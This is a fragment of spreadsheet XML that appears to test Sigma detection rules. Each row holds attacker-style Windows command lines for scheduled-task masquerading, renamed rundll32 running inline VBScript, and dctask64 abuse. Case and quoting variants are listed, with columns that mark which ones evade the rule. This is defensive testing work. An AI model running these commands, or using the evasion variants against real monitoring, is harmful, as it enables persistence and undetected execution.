      <c r="G1103" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1103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103" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1103" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1104" ht="15.75" customHeight="1" s="42">
      <c r="A1104" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1104" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1104" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1104" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1104" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" /"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1104" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1104" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1104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104" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1104" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1105" ht="15.75" customHeight="1" s="42">
      <c r="A1105" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1105" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1105" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1105" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1105" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" -"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1105" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1105" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1105" s="36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105" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1105" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1106" ht="15.75" customHeight="1" s="42">
      <c r="A1106" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1106" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1106" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1106" s="43" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1106" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /tn "MyScheduledTask.xml" /XML C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1106" s="43" t="n"/>
      <c r="J1106" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1106" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1107" ht="15.75" customHeight="1" s="42">
      <c r="A1107" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1107" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1107" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1107" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1107" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTE /tn "MyScheduledTask.xml" /xML C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1107" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1107" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1107" s="43" t="inlineStr">
        <is>
          <t>Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE (81325ce1-be01-4250-944f-b4789644556f); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1107" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1107" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1108" ht="15.75" customHeight="1" s="42">
      <c r="A1108" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1108" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1108" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1108" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1108" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1108" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1108" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1108" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1108" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1108" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1108" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1109" ht="15.75" customHeight="1" s="42">
      <c r="A1109" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1109" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1109" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1109" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1109" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATE /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1109" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1109" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1109" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1109" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1109" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1109" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1110" ht="15.75" customHeight="1" s="42">
      <c r="A1110" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1110" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1110" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1110" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1110" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /XmL "C:\temp\masqueraded_payload.txt" /f /"tr" "dummy.xml"</t>
        </is>
      </c>
      <c r="F1110" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1110" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1110" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1110" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1110" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1110" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1111" ht="15.75" customHeight="1" s="42">
      <c r="A1111" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1111" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1111" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1111" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1111" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /tn "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1111" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1111" s="43" t="n"/>
      <c r="J1111" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1111" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1112" ht="15.75" customHeight="1" s="42">
      <c r="A1112" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1112" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1112" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1112" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1112" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tN "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /"f" /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1112" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1112" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1112" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1112" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1112" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1113" ht="15.75" customHeight="1" s="42">
      <c r="A1113" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1113" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1113" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1113" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1113" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" -"tn" "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" -"f" /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1113" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1113" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1113" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1113" s="43" t="n"/>
      <c r="J1113" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1113" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1114" ht="15.75" customHeight="1" s="42">
      <c r="A1114" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1114" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1114" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1114" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1114" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CReAtE /tn "SuspiciousTask" /"xml" "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1114" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1114" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1114" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1114" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1114" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1115" ht="15.75" customHeight="1" s="42">
      <c r="A1115" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1115" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1115" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1115" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1115" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" /"xml" "C:\temp\masqueraded_payload.txt" /f /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1115" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1115" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1115" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1115" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1115" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1116" ht="15.75" customHeight="1" s="42">
      <c r="A1116" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1116" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1116" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1116" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1116" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /"tn" "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /f /"tr" "dummy.xml"</t>
        </is>
      </c>
      <c r="F1116" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1116" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1116" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1116" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1116" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1117" ht="15.75" customHeight="1" s="42">
      <c r="A1117" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1117" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1117" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1117" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1117" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -"create" /"tn" "SuspiciousTask" /xml "C:\temp\masqueraded_payload.txt" /F /tr "dummy.xml"</t>
        </is>
      </c>
      <c r="F1117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1117" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1117" s="36" t="n"/>
      <c r="J1117" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1117" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1118" ht="15.75" customHeight="1" s="42">
      <c r="A1118" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1118" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1118" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1118" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1118" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "SuspiciousTask" -"xml" "C:\temp\masqueraded_payload.txt" /f /TR "dummy.xml"</t>
        </is>
      </c>
      <c r="F1118" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1118" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1118" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1118" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1118" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1119" ht="15.75" customHeight="1" s="42">
      <c r="A1119" s="43" t="n"/>
      <c r="B1119" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_inline_vbs</t>
        </is>
      </c>
      <c r="C1119" s="36" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Invoking Inline VBScript</t>
        </is>
      </c>
      <c r="D1119" s="36" t="inlineStr">
        <is>
          <t>1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd</t>
        </is>
      </c>
      <c r="E1119" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\rundll32.exe %TEMP%\updater.exe &amp;&amp; %TEMP%\updater.exe vbscript:"Execute(RegRead('...')); window.close;"</t>
        </is>
      </c>
      <c r="F1119" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1119" s="36" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Rename Of Highly Relevant Binaries (0ba1da6d-b6ce-4366-828c-18826c9de23e); Suspicious Rundll32 Invoking Inline VBScript (1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd); LOL-Binary Copied From System Directory (f5d19838-41b5-476c-98d8-ba8af4929ee2); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1119" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1119" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1120" ht="15.75" customHeight="1" s="42">
      <c r="A1120" s="43" t="n"/>
      <c r="B1120" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sysnative</t>
        </is>
      </c>
      <c r="C1120" s="36" t="inlineStr">
        <is>
          <t>Process Creation Using Sysnative Folder</t>
        </is>
      </c>
      <c r="D1120" s="36" t="inlineStr">
        <is>
          <t>3c1b5fb0-c72f-45ba-abd1-4d4c353144ab</t>
        </is>
      </c>
      <c r="E1120" s="36" t="inlineStr">
        <is>
          <t>C:/Windows/Sysnative/cmd.exe</t>
        </is>
      </c>
      <c r="F1120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1120" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1120" s="36" t="n"/>
      <c r="J1120" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1120" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1121" ht="15.75" customHeight="1" s="42">
      <c r="A1121" s="43" t="n"/>
      <c r="B1121" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C1121" s="36" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D1121" s="36" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E1121" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe -k netsvcs</t>
        </is>
      </c>
      <c r="F1121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1121" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1121" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1121" s="36" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J1121" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1121" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1122" ht="15.75" customHeight="1" s="42">
      <c r="A1122" s="43" t="n"/>
      <c r="B1122" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C1122" s="36" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D1122" s="36" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E1122" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe /"k" netsvcs</t>
        </is>
      </c>
      <c r="F1122" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1122" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1122" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1122" s="43" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J1122" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1122" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1123" ht="15.75" customHeight="1" s="42">
      <c r="A1123" s="43" t="n"/>
      <c r="B1123" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C1123" s="36" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D1123" s="36" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E1123" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe -K netsvcs</t>
        </is>
      </c>
      <c r="F1123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1123" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1123" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1123" s="36" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J1123" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1123" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1124" ht="15.75" customHeight="1" s="42">
      <c r="A1124" s="43" t="n"/>
      <c r="B1124" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C1124" s="43" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D1124" s="43" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E1124" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe /k netsvcs</t>
        </is>
      </c>
      <c r="F1124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1124" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1124" s="43" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J1124" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1124" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1125" ht="15.75" customHeight="1" s="42">
      <c r="A1125" s="36" t="n"/>
      <c r="B1125" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C1125" s="36" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D1125" s="36" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E1125" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe -"k" netsvcs</t>
        </is>
      </c>
      <c r="F1125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1125" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1125" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1125" s="43" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J1125" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1125" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1126" ht="15.75" customHeight="1" s="42">
      <c r="A1126" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B1126" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C1126" s="36" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D1126" s="36" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E1126" s="36" t="inlineStr">
        <is>
          <t>copy C:\ManageEngine\UEMS_Agent\bin\dctask64.exe C:\Temp\not_suspicious.exe &amp;&amp; C:\Temp\not_suspicious.exe -executecmd64 "whoami"</t>
        </is>
      </c>
      <c r="F1126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1126" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1126" s="36" t="n"/>
      <c r="J1126" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1126" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1127" ht="15.75" customHeight="1" s="42">
      <c r="A1127" s="43" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B1127" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dctask64_arbitrary_command_and_dll_execution</t>
        </is>
      </c>
      <c r="C1127" s="36" t="inlineStr">
        <is>
          <t>ManageEngine Endpoint Central Dctask64.EXE Potential Abuse</t>
        </is>
      </c>
      <c r="D1127" s="36" t="inlineStr">
        <is>
          <t>6345b048-8441-43a7-9bed-541133633d7a</t>
        </is>
      </c>
      <c r="E1127" s="36" t="inlineStr">
        <is>
          <t>copy C:\ManageEngine\UEMS_Agent\bin\dctask64.exe C:\Temp\not_suspicious.exe &amp;&amp; C:\Temp\not_suspicious.exe -ExECUTecMd64 "whoami"</t>
        </is>
      </c>
      <c r="F1127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1127" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1127" s="43" t="n"/>
      <c r="J1127" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1127" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1128" ht="15.75" customHeight="1" s="42">
      <c r="A1128" s="43" t="inlineStr">
        <is>
